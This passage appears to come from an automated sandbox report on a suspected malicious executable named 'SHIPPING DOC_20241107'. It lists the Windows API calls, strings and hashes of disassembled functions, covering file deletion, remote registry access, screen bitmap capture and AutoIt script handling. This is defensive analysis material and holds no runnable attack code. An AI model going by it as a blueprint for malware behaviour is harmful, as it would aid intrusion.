                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3840717409-0
                                                                                                                              • Opcode ID: 9bf55e9f2a44a6cd7dbe3057da42ccb5f5e567d88e06f4c5b0f8b6047d3a1fd0
                                                                                                                              • Instruction ID: de6950843ad71b0213bff09cdf7db5d211e1e9feca657b56813552a2485adf70
                                                                                                                              • Opcode Fuzzy Hash: 9bf55e9f2a44a6cd7dbe3057da42ccb5f5e567d88e06f4c5b0f8b6047d3a1fd0
                                                                                                                              • Instruction Fuzzy Hash: 2B414975A10208EFDB11DFA5DC88EABBBB9EF89711F104069FA09D7260DB309901DB60
                                                                                                                              APIs
                                                                                                                              • __wsplitpath.LIBCMT ref: 00A1DA9C
                                                                                                                              • _wcscat.LIBCMT ref: 00A1DAB4
                                                                                                                              • _wcscat.LIBCMT ref: 00A1DAC6
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A1DADB
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A1DAEF
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A1DB07
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A1DB21
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A1DB33
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 34673085-438819550
                                                                                                                              • Opcode ID: 1fc2ccbde75ebe44972b31a82d9acf38f6192ba80d0af084775d9a677a2565ce
                                                                                                                              • Instruction ID: 39122642a085a274cda96537c580276ca425a87c6e90f60079197acf11533d77
                                                                                                                              • Opcode Fuzzy Hash: 1fc2ccbde75ebe44972b31a82d9acf38f6192ba80d0af084775d9a677a2565ce
                                                                                                                              • Instruction Fuzzy Hash: 8B8174725182419FCB24EF64C944AEAB7E8BF89350F18482EF486D7251D730E984CB92
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • PostMessageW.USER32 ref: 00A3C266
                                                                                                                              • GetFocus.USER32(?,?,?,?), ref: 00A3C276
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A3C281
                                                                                                                              • _memset.LIBCMT ref: 00A3C3AC
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A3C3D7
                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00A3C3F7
                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A3C40A
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A3C43E
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A3C486
                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A3C4BE
                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A3C4F3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                                              • Opcode ID: de8a5aa911976967891bd272206c529199a79b29684bdceeee5a294d4668af83
                                                                                                                              • Instruction ID: 725531baafddf4722ff48e7a3e720f03371360767d4fa2b67753b6a23a449f55
                                                                                                                              • Opcode Fuzzy Hash: de8a5aa911976967891bd272206c529199a79b29684bdceeee5a294d4668af83
                                                                                                                              • Instruction Fuzzy Hash: B5816E71508311AFD710DF54DD98A6BBBE8EF88324F10892EF995A7291C770D805CBA2
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 00A274A4
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A274B0
                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00A274BC
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00A274C9
                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A2751D
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A27559
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A2757D
                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 00A27585
                                                                                                                              • DeleteObject.GDI32(?), ref: 00A2758E
                                                                                                                              • DeleteDC.GDI32(00000006), ref: 00A27595
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00A275A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                              • String ID: (
                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                              • Opcode ID: c79d9005c75d360a611b2558be31363df5bd24700015c6bcc50eef27bbd5f94b
                                                                                                                              • Instruction ID: 466f4f65026e44ca7a77bb9d8349c54e7a927f7003f819949b97b7db26f4067d
                                                                                                                              • Opcode Fuzzy Hash: c79d9005c75d360a611b2558be31363df5bd24700015c6bcc50eef27bbd5f94b
                                                                                                                              • Instruction Fuzzy Hash: 53514A75904319EFCB15CFA8DC85EAEBBB9EF49310F14842EF98997211D731A941CB60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A19008: __time64.LIBCMT ref: 00A19012
                                                                                                                                • Part of subcall function 009B5045: _fseek.LIBCMT ref: 009B505D
                                                                                                                              • __wsplitpath.LIBCMT ref: 00A192DD
                                                                                                                                • Part of subcall function 009D426E: __wsplitpath_helper.LIBCMT ref: 009D42AE
                                                                                                                              • _wcscpy.LIBCMT ref: 00A192F0
                                                                                                                              • _wcscat.LIBCMT ref: 00A19303
                                                                                                                              • __wsplitpath.LIBCMT ref: 00A19328
                                                                                                                              • _wcscat.LIBCMT ref: 00A1933E
                                                                                                                              • _wcscat.LIBCMT ref: 00A19351
                                                                                                                                • Part of subcall function 00A1904E: _memmove.LIBCMT ref: 00A19087
                                                                                                                                • Part of subcall function 00A1904E: _memmove.LIBCMT ref: 00A19096
                                                                                                                              • _wcscmp.LIBCMT ref: 00A19298
                                                                                                                                • Part of subcall function 00A197DD: _wcscmp.LIBCMT ref: 00A198CD
                                                                                                                                • Part of subcall function 00A197DD: _wcscmp.LIBCMT ref: 00A198E0
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A194FB
                                                                                                                              • _wcsncpy.LIBCMT ref: 00A1956E
                                                                                                                              • DeleteFileW.KERNEL32(?,?), ref: 00A195A4
                                                                                                                              • CopyFileW.KERNEL32 ref: 00A195BA
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A195CB
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A195DD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1500180987-0
                                                                                                                              • Opcode ID: d1f5851396e4a9d3ebe50f401472c5ad23d6c42d8d0eb79bce04b134afcc2e08
                                                                                                                              • Instruction ID: 8f6d0910050f705dfab183fb81a4f97bb7da4ca0c2608d428599d20753306a5f
                                                                                                                              • Opcode Fuzzy Hash: d1f5851396e4a9d3ebe50f401472c5ad23d6c42d8d0eb79bce04b134afcc2e08
                                                                                                                              • Instruction Fuzzy Hash: 48C129B1D00219AACF21DF95CD95ADFBBBDEF84310F0040AAF609E6251DB309A85CF65
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D0AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,009B6C6C,?,00008000), ref: 009D0AF3
                                                                                                                                • Part of subcall function 009B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009B48A1,?,?,009B37C0,?), ref: 009B48CE
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 009B6D0D
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009B6E5A
                                                                                                                                • Part of subcall function 009B59CD: _wcscpy.LIBCMT ref: 009B5A05
                                                                                                                                • Part of subcall function 009D37BD: _iswctype.LIBCMT ref: 009D37C5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                              • API String ID: 537147316-1018226102
                                                                                                                              • Opcode ID: e402e32ced6965d70e193a8484b40f7ac0baf77a8436db2d2df7d5251fe84665
                                                                                                                              • Instruction ID: b9e1dc39c8ad330db242a056d9fd7ccb853a5fc4295702f2258d21c66480863e
                                                                                                                              • Opcode Fuzzy Hash: e402e32ced6965d70e193a8484b40f7ac0baf77a8436db2d2df7d5251fe84665
                                                                                                                              • Instruction Fuzzy Hash: A6029E311083419FC725EF24CA81AAFBBE5BFD8324F14491DF485972A1DB34E949CB52
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 009B45F9
                                                                                                                              • GetMenuItemCount.USER32(00A75890), ref: 009ED6FD
                                                                                                                              • GetMenuItemCount.USER32(00A75890), ref: 009ED7AD
                                                                                                                              • GetCursorPos.USER32(?), ref: 009ED7F1
                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 009ED7FA
                                                                                                                              • TrackPopupMenuEx.USER32 ref: 009ED80D
                                                                                                                              • PostMessageW.USER32 ref: 009ED819
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2751501086-0
                                                                                                                              • Opcode ID: d1a796d19c46a0656c2095d1319771136121cd39718077fb22905189876c4c02
                                                                                                                              • Instruction ID: 716e1cae7b6f3e51c2a99b8750d070a89558489299c8cd0fc62671da0ca14bdc
                                                                                                                              • Opcode Fuzzy Hash: d1a796d19c46a0656c2095d1319771136121cd39718077fb22905189876c4c02
                                                                                                                              • Instruction Fuzzy Hash: 29713570A01249BFEB219F55CC49FEABF68FF05764F200216F518A61E1C7B5AC60DB90
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              • _memset.LIBCMT ref: 00A07B93
                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A07BC8
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A07BE4
                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A07C00
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00A07C2A
                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00A07C52
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A07C5D
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A07C62
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                              • Opcode ID: af705d2d271feeb24372a1f806c442acdd3f258344f78780c294118bb59a313e
                                                                                                                              • Instruction ID: 1f5480ea8be0a7d4495b3fdbcfdf0d6fcb2db1089d68d2b01d63c4f1fb388b74
                                                                                                                              • Opcode Fuzzy Hash: af705d2d271feeb24372a1f806c442acdd3f258344f78780c294118bb59a313e
                                                                                                                              • Instruction Fuzzy Hash: 0241F876C1422DABDB15EBE4DC85EEEB778FF48710B044569F815A31A1EB309E05CB90
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A30EBC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                              • API String ID: 3964851224-909552448
                                                                                                                              • Opcode ID: dad603f81f1422d868e7c4e9d6128e0e8a9bcd762fa549a2d2fdb0b5e0fe316c
                                                                                                                              • Instruction ID: 096005e66e775f9a1d59d1f7456a75e4e058eea2d14b1e927e4281d0c370e54c
                                                                                                                              • Opcode Fuzzy Hash: dad603f81f1422d868e7c4e9d6128e0e8a9bcd762fa549a2d2fdb0b5e0fe316c
                                                                                                                              • Instruction Fuzzy Hash: 6A416D3415024A8BCF24EF20D9E5BEE3738AFA2350F544525FC925B292DB359D5ACB60
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009EE5F9,00000010,?,Bad directive syntax error,00A3F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A0FAF3
                                                                                                                              • LoadStringW.USER32(00000000,?,009EE5F9,00000010), ref: 00A0FAFA
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • _wprintf.LIBCMT ref: 00A0FB2D
                                                                                                                              • __swprintf.LIBCMT ref: 00A0FB4F
                                                                                                                              • MessageBoxW.USER32 ref: 00A0FBBE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                              • API String ID: 1506413516-4153970271
                                                                                                                              • Opcode ID: 4f89b598359ed5b11efd501963f5d4815ca62356ce57255e657d636db6bcd393
                                                                                                                              • Instruction ID: 8b2d82d9bd7be1f22b999749989b22024b2640b9141dc25a0915b09866e7ca6c
                                                                                                                              • Opcode Fuzzy Hash: 4f89b598359ed5b11efd501963f5d4815ca62356ce57255e657d636db6bcd393
                                                                                                                              • Instruction Fuzzy Hash: C0217C3284021EBFCF22EFA0CC56FEEB739BF58700F044966F515620A1DA719A18DB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                                • Part of subcall function 009B7A84: _memmove.LIBCMT ref: 009B7B0D
                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A153D7
                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A153ED
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A153FE
                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A15410
                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A15421
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$_memmove
                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                              • API String ID: 2279737902-1007645807
                                                                                                                              • Opcode ID: 9aa6393038f0554f964f4bcdadfbc4207632b754011108bc1df7e4864266bee6
                                                                                                                              • Instruction ID: 973f630da79382b6c4014bd5eea30828ab6e3a3a22148abe34cdc2d1be74f3ef
                                                                                                                              • Opcode Fuzzy Hash: 9aa6393038f0554f964f4bcdadfbc4207632b754011108bc1df7e4864266bee6
                                                                                                                              • Instruction Fuzzy Hash: C1118F25A9012979D720B7B1DD9AEFFBB7CFFD1F50F400A29B411A20D1DEA05D85C5A0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                              • Opcode ID: 0401ab39a7b1fc87e9afb08f5dd73d4db2ac7e4e70b5d57757a758a90119f1fe
                                                                                                                              • Instruction ID: d48c7eebbfc14ffc307bfc25e9315c1173ba0817e0816d331b39ffc35d3f826b
                                                                                                                              • Opcode Fuzzy Hash: 0401ab39a7b1fc87e9afb08f5dd73d4db2ac7e4e70b5d57757a758a90119f1fe
                                                                                                                              • Instruction Fuzzy Hash: 61112431914104AFDB24A7A8DD4AFEA77BCEF86720F1441B6F404961A1EF708AC286A0
                                                                                                                              APIs
                                                                                                                              • timeGetTime.WINMM ref: 00A15021
                                                                                                                                • Part of subcall function 009D034A: timeGetTime.WINMM ref: 009D034E
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A1504D
                                                                                                                              • EnumThreadWindows.USER32 ref: 00A15071
                                                                                                                              • FindWindowExW.USER32 ref: 00A15093
                                                                                                                              • SetActiveWindow.USER32 ref: 00A150B2
                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A150C0
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A150DF
                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00A150EA
                                                                                                                              • IsWindow.USER32 ref: 00A150F6
                                                                                                                              • EndDialog.USER32 ref: 00A15107
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                              • String ID: BUTTON
                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                              • Opcode ID: 2e6b7c5f42de4f6c9f21525ecd10b278a1f80b834a897977100317786ac324b7
                                                                                                                              • Instruction ID: c94ef8eef3c40c4859bd986798392dfe721f37d922dc4d9325056a55db15c350
                                                                                                                              • Opcode Fuzzy Hash: 2e6b7c5f42de4f6c9f21525ecd10b278a1f80b834a897977100317786ac324b7
